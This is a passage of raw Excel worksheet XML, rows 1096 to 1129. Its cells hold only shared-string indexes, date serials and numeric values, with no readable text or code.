        <v>262</v>
      </c>
      <c r="N1096" t="s">
        <v>263</v>
      </c>
      <c r="Q1096" s="95" t="s">
        <v>1671</v>
      </c>
      <c r="T1096">
        <v>4917</v>
      </c>
      <c r="U1096">
        <v>7617</v>
      </c>
      <c r="W1096" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="1097" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1097" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1097" s="52">
        <v>44292.08536261574</v>
      </c>
      <c r="C1097" s="95" t="s">
        <v>3433</v>
      </c>
      <c r="D1097" s="96">
        <v>106</v>
      </c>
      <c r="E1097" s="95" t="s">
        <v>3440</v>
      </c>
      <c r="F1097" s="42">
        <v>106</v>
      </c>
      <c r="G1097" s="95" t="s">
        <v>3441</v>
      </c>
      <c r="H1097" t="s">
        <v>2850</v>
      </c>
      <c r="I1097" t="s">
        <v>31</v>
      </c>
      <c r="J1097" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1097" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1097" t="s">
        <v>77</v>
      </c>
      <c r="M1097" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1097" t="s">
        <v>263</v>
      </c>
      <c r="Q1097" s="95" t="s">
        <v>3436</v>
      </c>
      <c r="R1097">
        <v>62</v>
      </c>
      <c r="S1097">
        <v>71</v>
      </c>
      <c r="T1097">
        <v>88</v>
      </c>
      <c r="U1097">
        <v>49</v>
      </c>
      <c r="V1097">
        <v>57</v>
      </c>
      <c r="W1097" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="1098" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1098" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1098" s="52">
        <v>44250.648645960646</v>
      </c>
      <c r="C1098" s="95" t="s">
        <v>3433</v>
      </c>
      <c r="D1098" s="96">
        <v>106</v>
      </c>
      <c r="E1098" s="95" t="s">
        <v>3442</v>
      </c>
      <c r="F1098" s="42">
        <v>100</v>
      </c>
      <c r="G1098" s="95" t="s">
        <v>3443</v>
      </c>
      <c r="H1098" t="s">
        <v>3444</v>
      </c>
      <c r="I1098" t="s">
        <v>31</v>
      </c>
      <c r="J1098" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1098" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1098" t="s">
        <v>77</v>
      </c>
      <c r="M1098" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1098" t="s">
        <v>263</v>
      </c>
      <c r="Q1098" s="95" t="s">
        <v>3436</v>
      </c>
      <c r="W1098" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="1099" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1099" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1099" s="52">
        <v>44558.744427129626</v>
      </c>
      <c r="C1099" s="95" t="s">
        <v>3445</v>
      </c>
      <c r="D1099" s="96">
        <v>100</v>
      </c>
      <c r="E1099" s="95" t="s">
        <v>3446</v>
      </c>
      <c r="F1099" s="42">
        <v>100</v>
      </c>
      <c r="G1099" s="95" t="s">
        <v>3447</v>
      </c>
      <c r="H1099" t="s">
        <v>3448</v>
      </c>
      <c r="I1099" t="s">
        <v>31</v>
      </c>
      <c r="J1099" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1099" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1099" t="s">
        <v>77</v>
      </c>
      <c r="M1099" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1099" t="s">
        <v>263</v>
      </c>
      <c r="Q1099" s="95" t="s">
        <v>3449</v>
      </c>
      <c r="R1099">
        <v>104</v>
      </c>
      <c r="S1099">
        <v>7159</v>
      </c>
      <c r="T1099">
        <v>7318</v>
      </c>
      <c r="U1099">
        <v>6270</v>
      </c>
      <c r="V1099">
        <v>10197</v>
      </c>
      <c r="W1099" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1100" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1100" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1100" s="52"/>
      <c r="C1100" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1100" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1100" s="95" t="s">
        <v>3450</v>
      </c>
      <c r="F1100" s="42">
        <v>100</v>
      </c>
      <c r="G1100" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1100" t="s">
        <v>3451</v>
      </c>
      <c r="I1100" t="s">
        <v>82</v>
      </c>
      <c r="J1100" s="95" t="s">
        <v>32</v>
      </c>
      <c r="K1100" s="95" t="s">
        <v>32</v>
      </c>
      <c r="L1100" t="s">
        <v>83</v>
      </c>
      <c r="M1100" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P1100" t="s">
        <v>2065</v>
      </c>
      <c r="Q1100" s="95" t="s">
        <v>85</v>
      </c>
      <c r="W1100" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1101" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1101" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1101" s="52"/>
      <c r="C1101" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1101" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1101" s="95" t="s">
        <v>3452</v>
      </c>
      <c r="F1101" s="42">
        <v>100</v>
      </c>
      <c r="G1101" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1101" t="s">
        <v>3453</v>
      </c>
      <c r="I1101" t="s">
        <v>268</v>
      </c>
      <c r="J1101" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1101" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1101" t="s">
        <v>77</v>
      </c>
      <c r="M1101" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N1101" t="s">
        <v>291</v>
      </c>
      <c r="P1101" t="s">
        <v>250</v>
      </c>
      <c r="Q1101" s="95" t="s">
        <v>3454</v>
      </c>
      <c r="W1101" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1102" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1102" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1102" s="52"/>
      <c r="C1102" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1102" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1102" s="95" t="s">
        <v>3455</v>
      </c>
      <c r="F1102" s="42">
        <v>200</v>
      </c>
      <c r="G1102" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1102" t="s">
        <v>3456</v>
      </c>
      <c r="I1102" t="s">
        <v>611</v>
      </c>
      <c r="J1102" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K1102" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L1102" t="s">
        <v>77</v>
      </c>
      <c r="M1102" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N1102" t="s">
        <v>613</v>
      </c>
      <c r="P1102" t="s">
        <v>2911</v>
      </c>
      <c r="Q1102" s="95" t="s">
        <v>2918</v>
      </c>
      <c r="W1102" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1103" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1103" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1103" s="52">
        <v>44629.688684039349</v>
      </c>
      <c r="C1103" s="95" t="s">
        <v>3457</v>
      </c>
      <c r="D1103" s="96">
        <v>201</v>
      </c>
      <c r="E1103" s="95" t="s">
        <v>3458</v>
      </c>
      <c r="F1103" s="42">
        <v>201</v>
      </c>
      <c r="G1103" s="95" t="s">
        <v>3459</v>
      </c>
      <c r="H1103" t="s">
        <v>3216</v>
      </c>
      <c r="I1103" t="s">
        <v>156</v>
      </c>
      <c r="J1103" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1103" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1103" t="s">
        <v>77</v>
      </c>
      <c r="M1103" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1103" t="s">
        <v>476</v>
      </c>
      <c r="Q1103" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1103">
        <v>23</v>
      </c>
      <c r="S1103">
        <v>66</v>
      </c>
      <c r="T1103">
        <v>49</v>
      </c>
      <c r="U1103">
        <v>9</v>
      </c>
      <c r="V1103">
        <v>6</v>
      </c>
      <c r="W1103" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1104" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1104" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1104" s="52">
        <v>44629.696740081017</v>
      </c>
      <c r="C1104" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1104" s="96">
        <v>200</v>
      </c>
      <c r="E1104" s="95" t="s">
        <v>3461</v>
      </c>
      <c r="F1104" s="42">
        <v>200</v>
      </c>
      <c r="G1104" s="95" t="s">
        <v>3462</v>
      </c>
      <c r="H1104" t="s">
        <v>3463</v>
      </c>
      <c r="I1104" t="s">
        <v>156</v>
      </c>
      <c r="J1104" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1104" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1104" t="s">
        <v>77</v>
      </c>
      <c r="M1104" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1104" t="s">
        <v>476</v>
      </c>
      <c r="Q1104" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1104">
        <v>12</v>
      </c>
      <c r="S1104">
        <v>44</v>
      </c>
      <c r="T1104">
        <v>259</v>
      </c>
      <c r="U1104">
        <v>205</v>
      </c>
      <c r="V1104">
        <v>178</v>
      </c>
      <c r="W1104" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1105" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1105" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1105" s="52">
        <v>44519.444953668979</v>
      </c>
      <c r="C1105" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1105" s="96">
        <v>201</v>
      </c>
      <c r="E1105" s="95" t="s">
        <v>3461</v>
      </c>
      <c r="F1105" s="42">
        <v>201</v>
      </c>
      <c r="G1105" s="95" t="s">
        <v>3462</v>
      </c>
      <c r="H1105" t="s">
        <v>3463</v>
      </c>
      <c r="I1105" t="s">
        <v>156</v>
      </c>
      <c r="J1105" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1105" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1105" t="s">
        <v>77</v>
      </c>
      <c r="M1105" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1105" t="s">
        <v>476</v>
      </c>
      <c r="Q1105" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R1105">
        <v>12</v>
      </c>
      <c r="S1105">
        <v>44</v>
      </c>
      <c r="T1105">
        <v>259</v>
      </c>
      <c r="U1105">
        <v>205</v>
      </c>
      <c r="V1105">
        <v>178</v>
      </c>
      <c r="W1105" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1106" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1106" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1106" s="52">
        <v>44629.696740092593</v>
      </c>
      <c r="C1106" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1106" s="96">
        <v>200</v>
      </c>
      <c r="E1106" s="95" t="s">
        <v>3464</v>
      </c>
      <c r="F1106" s="42">
        <v>200</v>
      </c>
      <c r="G1106" s="95" t="s">
        <v>3465</v>
      </c>
      <c r="H1106" t="s">
        <v>3220</v>
      </c>
      <c r="I1106" t="s">
        <v>156</v>
      </c>
      <c r="J1106" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1106" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1106" t="s">
        <v>77</v>
      </c>
      <c r="M1106" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1106" t="s">
        <v>476</v>
      </c>
      <c r="Q1106" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1106">
        <v>2</v>
      </c>
      <c r="S1106">
        <v>24</v>
      </c>
      <c r="T1106">
        <v>77</v>
      </c>
      <c r="U1106">
        <v>48</v>
      </c>
      <c r="V1106">
        <v>73</v>
      </c>
      <c r="W1106" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1107" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1107" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1107" s="52">
        <v>44519.444953692131</v>
      </c>
      <c r="C1107" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1107" s="96">
        <v>201</v>
      </c>
      <c r="E1107" s="95" t="s">
        <v>3464</v>
      </c>
      <c r="F1107" s="42">
        <v>201</v>
      </c>
      <c r="G1107" s="95" t="s">
        <v>3465</v>
      </c>
      <c r="H1107" t="s">
        <v>3220</v>
      </c>
      <c r="I1107" t="s">
        <v>156</v>
      </c>
      <c r="J1107" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1107" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1107" t="s">
        <v>77</v>
      </c>
      <c r="M1107" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1107" t="s">
        <v>476</v>
      </c>
      <c r="Q1107" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R1107">
        <v>2</v>
      </c>
      <c r="S1107">
        <v>24</v>
      </c>
      <c r="T1107">
        <v>77</v>
      </c>
      <c r="U1107">
        <v>48</v>
      </c>
      <c r="V1107">
        <v>73</v>
      </c>
      <c r="W1107" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1108" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1108" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1108" s="52">
        <v>44629.696740092593</v>
      </c>
      <c r="C1108" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1108" s="96">
        <v>200</v>
      </c>
      <c r="E1108" s="95" t="s">
        <v>3466</v>
      </c>
      <c r="F1108" s="42">
        <v>200</v>
      </c>
      <c r="G1108" s="95" t="s">
        <v>3467</v>
      </c>
      <c r="H1108" t="s">
        <v>3226</v>
      </c>
      <c r="I1108" t="s">
        <v>156</v>
      </c>
      <c r="J1108" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1108" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1108" t="s">
        <v>77</v>
      </c>
      <c r="M1108" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1108" t="s">
        <v>476</v>
      </c>
      <c r="Q1108" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1108">
        <v>2</v>
      </c>
      <c r="S1108">
        <v>22</v>
      </c>
      <c r="T1108">
        <v>207</v>
      </c>
      <c r="U1108">
        <v>203</v>
      </c>
      <c r="V1108">
        <v>178</v>
      </c>
      <c r="W1108" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1109" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1109" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1109" s="52">
        <v>44519.444953726852</v>
      </c>
      <c r="C1109" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1109" s="96">
        <v>201</v>
      </c>
      <c r="E1109" s="95" t="s">
        <v>3466</v>
      </c>
      <c r="F1109" s="42">
        <v>201</v>
      </c>
      <c r="G1109" s="95" t="s">
        <v>3467</v>
      </c>
      <c r="H1109" t="s">
        <v>3226</v>
      </c>
      <c r="I1109" t="s">
        <v>156</v>
      </c>
      <c r="J1109" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1109" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1109" t="s">
        <v>77</v>
      </c>
      <c r="M1109" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1109" t="s">
        <v>476</v>
      </c>
      <c r="Q1109" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R1109">
        <v>2</v>
      </c>
      <c r="S1109">
        <v>22</v>
      </c>
      <c r="T1109">
        <v>207</v>
      </c>
      <c r="U1109">
        <v>203</v>
      </c>
      <c r="V1109">
        <v>178</v>
      </c>
      <c r="W1109" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1110" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1110" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1110" s="52">
        <v>44519.444953749997</v>
      </c>
      <c r="C1110" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1110" s="96">
        <v>200</v>
      </c>
      <c r="E1110" s="95" t="s">
        <v>3468</v>
      </c>
      <c r="F1110" s="42">
        <v>200</v>
      </c>
      <c r="G1110" s="95" t="s">
        <v>3469</v>
      </c>
      <c r="H1110" t="s">
        <v>3470</v>
      </c>
      <c r="I1110" t="s">
        <v>156</v>
      </c>
      <c r="J1110" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1110" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1110" t="s">
        <v>77</v>
      </c>
      <c r="M1110" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1110" t="s">
        <v>476</v>
      </c>
      <c r="Q1110" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1110">
        <v>1</v>
      </c>
      <c r="S1110">
        <v>14</v>
      </c>
      <c r="T1110">
        <v>17</v>
      </c>
      <c r="U1110">
        <v>9</v>
      </c>
      <c r="V1110">
        <v>17</v>
      </c>
      <c r="W1110" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1111" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1111" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1111" s="52">
        <v>44629.696740104169</v>
      </c>
      <c r="C1111" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1111" s="96">
        <v>201</v>
      </c>
      <c r="E1111" s="95" t="s">
        <v>3468</v>
      </c>
      <c r="F1111" s="42">
        <v>201</v>
      </c>
      <c r="G1111" s="95" t="s">
        <v>3469</v>
      </c>
      <c r="H1111" t="s">
        <v>3470</v>
      </c>
      <c r="I1111" t="s">
        <v>156</v>
      </c>
      <c r="J1111" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1111" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1111" t="s">
        <v>77</v>
      </c>
      <c r="M1111" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1111" t="s">
        <v>476</v>
      </c>
      <c r="Q1111" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R1111">
        <v>1</v>
      </c>
      <c r="S1111">
        <v>14</v>
      </c>
      <c r="T1111">
        <v>17</v>
      </c>
      <c r="U1111">
        <v>9</v>
      </c>
      <c r="V1111">
        <v>17</v>
      </c>
      <c r="W1111" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1112" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1112" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1112" s="52">
        <v>44519.444953773149</v>
      </c>
      <c r="C1112" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1112" s="96">
        <v>200</v>
      </c>
      <c r="E1112" s="95" t="s">
        <v>3471</v>
      </c>
      <c r="F1112" s="42">
        <v>200</v>
      </c>
      <c r="G1112" s="95" t="s">
        <v>3472</v>
      </c>
      <c r="H1112" t="s">
        <v>3473</v>
      </c>
      <c r="I1112" t="s">
        <v>156</v>
      </c>
      <c r="J1112" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1112" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1112" t="s">
        <v>77</v>
      </c>
      <c r="M1112" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1112" t="s">
        <v>476</v>
      </c>
      <c r="Q1112" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1112">
        <v>1</v>
      </c>
      <c r="S1112">
        <v>64</v>
      </c>
      <c r="T1112">
        <v>204</v>
      </c>
      <c r="U1112">
        <v>130</v>
      </c>
      <c r="V1112">
        <v>137</v>
      </c>
      <c r="W1112" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1113" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1113" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1113" s="52">
        <v>44629.696740115738</v>
      </c>
      <c r="C1113" s="95" t="s">
        <v>3460</v>
      </c>
      <c r="D1113" s="96">
        <v>201</v>
      </c>
      <c r="E1113" s="95" t="s">
        <v>3471</v>
      </c>
      <c r="F1113" s="42">
        <v>201</v>
      </c>
      <c r="G1113" s="95" t="s">
        <v>3472</v>
      </c>
      <c r="H1113" t="s">
        <v>3473</v>
      </c>
      <c r="I1113" t="s">
        <v>156</v>
      </c>
      <c r="J1113" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K1113" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1113" t="s">
        <v>77</v>
      </c>
      <c r="M1113" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1113" t="s">
        <v>476</v>
      </c>
      <c r="Q1113" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R1113">
        <v>1</v>
      </c>
      <c r="S1113">
        <v>64</v>
      </c>
      <c r="T1113">
        <v>204</v>
      </c>
      <c r="U1113">
        <v>130</v>
      </c>
      <c r="V1113">
        <v>137</v>
      </c>
      <c r="W1113" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1114" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1114" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1114" s="52"/>
      <c r="D1114" s="96"/>
      <c r="E1114" s="95" t="s">
        <v>3474</v>
      </c>
      <c r="F1114" s="42"/>
      <c r="H1114" t="s">
        <v>3475</v>
      </c>
      <c r="I1114" t="s">
        <v>2442</v>
      </c>
      <c r="Q1114" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1114" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1115" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1115" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1115" s="52"/>
      <c r="D1115" s="96"/>
      <c r="E1115" s="95" t="s">
        <v>3476</v>
      </c>
      <c r="F1115" s="42"/>
      <c r="H1115" t="s">
        <v>3475</v>
      </c>
      <c r="I1115" t="s">
        <v>2442</v>
      </c>
      <c r="Q1115" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1115" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1116" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1116" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1116" s="52"/>
      <c r="D1116" s="96"/>
      <c r="E1116" s="95" t="s">
        <v>3477</v>
      </c>
      <c r="F1116" s="42"/>
      <c r="H1116" t="s">
        <v>3475</v>
      </c>
      <c r="I1116" t="s">
        <v>2442</v>
      </c>
      <c r="Q1116" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1116" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1117" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1117" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1117" s="52"/>
      <c r="D1117" s="96"/>
      <c r="E1117" s="95" t="s">
        <v>3478</v>
      </c>
      <c r="F1117" s="42"/>
      <c r="H1117" t="s">
        <v>3475</v>
      </c>
      <c r="I1117" t="s">
        <v>2442</v>
      </c>
      <c r="Q1117" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1117" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1118" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1118" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1118" s="52"/>
      <c r="D1118" s="96"/>
      <c r="E1118" s="95" t="s">
        <v>3479</v>
      </c>
      <c r="F1118" s="42"/>
      <c r="H1118" t="s">
        <v>3475</v>
      </c>
      <c r="I1118" t="s">
        <v>2442</v>
      </c>
      <c r="Q1118" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1118" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1119" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1119" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1119" s="52"/>
      <c r="D1119" s="96"/>
      <c r="E1119" s="95" t="s">
        <v>3480</v>
      </c>
      <c r="F1119" s="42"/>
      <c r="H1119" t="s">
        <v>3475</v>
      </c>
      <c r="I1119" t="s">
        <v>2451</v>
      </c>
      <c r="Q1119" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1119" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1120" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1120" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1120" s="52"/>
      <c r="D1120" s="96"/>
      <c r="E1120" s="95" t="s">
        <v>3481</v>
      </c>
      <c r="F1120" s="42"/>
      <c r="H1120" t="s">
        <v>3475</v>
      </c>
      <c r="I1120" t="s">
        <v>210</v>
      </c>
      <c r="Q1120" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1120" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1121" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1121" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1121" s="52"/>
      <c r="D1121" s="96"/>
      <c r="E1121" s="95" t="s">
        <v>3482</v>
      </c>
      <c r="F1121" s="42"/>
      <c r="H1121" t="s">
        <v>2441</v>
      </c>
      <c r="I1121" t="s">
        <v>2460</v>
      </c>
      <c r="Q1121" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1121" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1122" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1122" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1122" s="52"/>
      <c r="D1122" s="96"/>
      <c r="E1122" s="95" t="s">
        <v>3483</v>
      </c>
      <c r="F1122" s="42"/>
      <c r="H1122" t="s">
        <v>2441</v>
      </c>
      <c r="I1122" t="s">
        <v>2460</v>
      </c>
      <c r="Q1122" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1122" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1123" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1123" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1123" s="52"/>
      <c r="D1123" s="96"/>
      <c r="E1123" s="95" t="s">
        <v>3484</v>
      </c>
      <c r="F1123" s="42"/>
      <c r="H1123" t="s">
        <v>2441</v>
      </c>
      <c r="I1123" t="s">
        <v>2460</v>
      </c>
      <c r="Q1123" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1123" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1124" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1124" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1124" s="52"/>
      <c r="D1124" s="96"/>
      <c r="E1124" s="95" t="s">
        <v>3485</v>
      </c>
      <c r="F1124" s="42"/>
      <c r="H1124" t="s">
        <v>2441</v>
      </c>
      <c r="I1124" t="s">
        <v>2460</v>
      </c>
      <c r="Q1124" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1124" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1125" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1125" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1125" s="52"/>
      <c r="D1125" s="96"/>
      <c r="E1125" s="95" t="s">
        <v>3486</v>
      </c>
      <c r="F1125" s="42"/>
      <c r="H1125" t="s">
        <v>2441</v>
      </c>
      <c r="I1125" t="s">
        <v>2460</v>
      </c>
      <c r="Q1125" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1125" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1126" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1126" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1126" s="52"/>
      <c r="D1126" s="96"/>
      <c r="E1126" s="95" t="s">
        <v>3487</v>
      </c>
      <c r="F1126" s="42"/>
      <c r="H1126" t="s">
        <v>2441</v>
      </c>
      <c r="I1126" t="s">
        <v>2460</v>
      </c>
      <c r="Q1126" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1126" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1127" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1127" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1127" s="52"/>
      <c r="D1127" s="96"/>
      <c r="E1127" s="95" t="s">
        <v>3488</v>
      </c>
      <c r="F1127" s="42"/>
      <c r="H1127" t="s">
        <v>2441</v>
      </c>
      <c r="I1127" t="s">
        <v>2460</v>
      </c>
      <c r="Q1127" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1127" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1128" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1128" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1128" s="52"/>
      <c r="D1128" s="96"/>
      <c r="E1128" s="95" t="s">
        <v>3489</v>
      </c>
      <c r="F1128" s="42"/>
      <c r="H1128" t="s">
        <v>3475</v>
      </c>
      <c r="I1128" t="s">
        <v>2451</v>
      </c>
      <c r="Q1128" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1128" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1129" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1129" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1129" s="52"/>
      <c r="D1129" s="96"/>
      <c r="E1129" s="95" t="s">
        <v>3490</v>
      </c>
      <c r="F1129" s="42"/>
      <c r="H1129" t="s">
        <v>3475</v>
      </c>
      <c r="I1129" t="s">
        <v>2442</v>
      </c>
      <c r="Q1129" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1129" t="s">
        <v>2443</v>
